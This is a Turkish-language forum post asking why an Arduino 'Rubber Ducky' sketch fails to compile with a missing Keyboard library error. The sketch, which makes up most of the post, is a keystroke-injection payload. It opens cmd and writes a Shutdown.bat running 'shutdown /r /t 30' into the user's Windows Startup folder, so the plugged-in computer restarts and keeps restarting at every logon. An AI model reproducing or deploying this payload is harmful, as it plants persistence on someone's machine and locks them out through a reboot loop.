Arduino İle Rubber Ducky

#include <Keyboard.h> 
// Init function
void setup()
{
 // Begining the stream
 Keyboard.begin();
// Waiting 500ms for init
 delay(500);
typeKey(27);
Keyboard.press(KEY_LEFT_CTRL);
 Keyboard.press(27);
 Keyboard.releaseAll();
delay(400);
Keyboard.print("cmd");
typeKey(KEY_RETURN);
delay(100);
// start making Shutdown.bat
 Keyboard.print("copy con \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Shutdown.bat\"");
Keyboard.print("@echo off");
typeKey(KEY_RETURN);
Keyboard.print("shutdown /r /t 30");
// The shutdown command has many good options '/t' adds a Delay, and '/r' restarts
 // '/s' will shut the computer down and '/l' (L) is to just logoff the user more options are available by running 'shutdown /?'
 typeKey(KEY_RETURN);
Keyboard.press(KEY_LEFT_CTRL);
 Keyboard.press(122);
 Keyboard.releaseAll();
Keyboard.print("exit");
typeKey(KEY_RETURN);
}
void typeKey(int key)
{
 Keyboard.press(key);
 delay(50);
 Keyboard.release(key);
}
// Unused
void loop() {}

Arduino Uno ile Rubber Ducky yapmaya çalışıyordum. “‘Klavye’ bulunamadı. Taslağınızda ‘#include<Keyboard.h>’ satırı yer alıyor mu ?” diye bi hata verdi, ama ilk satırda zaten yazıyor. Ben çok bişey anlayamadım, bu hata nasıl gider ?

Kodun Amacı : Arduino bilgisayara takıldığı anda bilgisayar kendini yeniden başlatır.

1 Beğeni